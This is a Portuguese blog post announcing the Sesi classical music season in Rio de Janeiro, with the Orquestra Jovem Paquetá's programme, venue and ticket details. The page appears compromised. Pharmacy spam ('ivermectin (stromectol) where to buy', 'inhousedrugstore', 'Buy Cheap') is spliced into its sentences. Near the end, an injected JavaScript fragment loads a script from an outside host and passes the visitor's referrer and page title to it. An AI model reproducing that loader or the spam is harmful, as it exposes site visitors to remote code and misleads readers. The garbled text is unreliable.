Música sinfônicaNotíciaProgramaçãoRio de Janeiro

A garotada sobe ao palco

Temporada Sesi de Música Clássica tem início com a Orquestra Jovem Paquetá.

 

Neste mês de aniversário de 450 anos da Cidade do Rio de Janeiro, os cariocas serão presenteados e homenageados com um circuito de música de concerto. A Temporada Sesi de Música Clássica volta ao Teatro Sesi Centro no dia 31 de março, com apresentações a partir de 12h30 e ingressos a R$ 2.

Estão programadas oito apresentações, de março a novembro, com uma pausa em julho. A ideia é trazer uma atração diferente por mês: Orquestra Jovem Paquetá Buy Cheap (março), Béla Quartett Cheap (abril), Trio UFRJ e viola (maio), online Quarteto Guanabara (junho), Fábrica Orquestra (agosto), Trio Imago-Mundi (setembro), Quarteto Mozart e Brahms (outubro) e ivermectin (stromectol) where to buy Quarteto Paulo Bosísio (novembro).

A Orquestra Jovem Paquetá (OJP) será a primeira a se apresentar, com repertório só de compositores nacionais – alguns cariocas –, de diferentes gerações e estilos. Na programação está uma das mais conhecidas obras de Lorenzo Fernandez, Batuque, da suíte sinfônica Reisado do Pastoreio; O Rio de Janeiro na Bela Época, de Tim Rescala; Suíte para Cordas, de Edino Krieger; Feira de Mangaio, de Sivuca; e Maré para Paquetá, do jovem e premiado compositor e percussionista Lourenço de Vasconcellos.

A OJP é regida pelo maestro Bruno Jardim e compõe-se por jovens músicos com idades entre 15 e 23 anos, participantes do projeto Bem-Me-Quer Paquetá, desenvolvido na Casa de Artes Paquetá, que tem a finalidade de formar crianças e jovens artística e musicalmente, e promover a cidadania de toda a comunidade.

Josiane Kevorkian, diretora artística, avalia que a relação temática regular do projeto com a história e identidade cultural da ilha vem contribuindo para gerações com maior pertencimento e mais protagonismo em seu ambiente cultural e social: “A Orquestra é fruto do trabalho contínuo de formação do Bem-Me-Quer Paquetá, seguindo critérios pedagógicos específicos de prática de conjunto. A participação desses jovens obedece a critérios técnicos e compromisso com ensaios e apresentações. Com a OJP, hoje, temos uma ilha mais mobilizada culturalmente. Somos parte importante desse processo de transformação que o lugar vive”.

 
Buy Order

SERVIÇO:

Temporada Sesi de Música Clássica

inhousedrugstore Orquestra Jovem Paquetá

Bruno Jardim, regente

 

31 de março, terça-feira, às 12h30

Teatro Sesi (Av. Graça Aranha, 1, Centro – Rio de Janeiro. Tel.: 21 2563-4163)

 

Ingressos a R$ 2. Venda antecipada na bilheteira do Teatro: de 2ª a 6ª, das 12h às 20h; sábados e domingos, sempre duas horas antes da atração.

Classificação livre

 

Programa:

O Rio de Janeiro na Bela Época (Tim Rescala)

Trenzinho do Caipira (Villa-Lobos. Adaptação de José Staneck)

Batuque (Lorenzo Fernandez)

Roda de Amigos (Guerra-Peixe)

Suíte para Cordas (Edino Krieger)

Maré para Paquetá (Lourenço de Vasconcellos)

Feira de Mangaio (Sivuca)

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.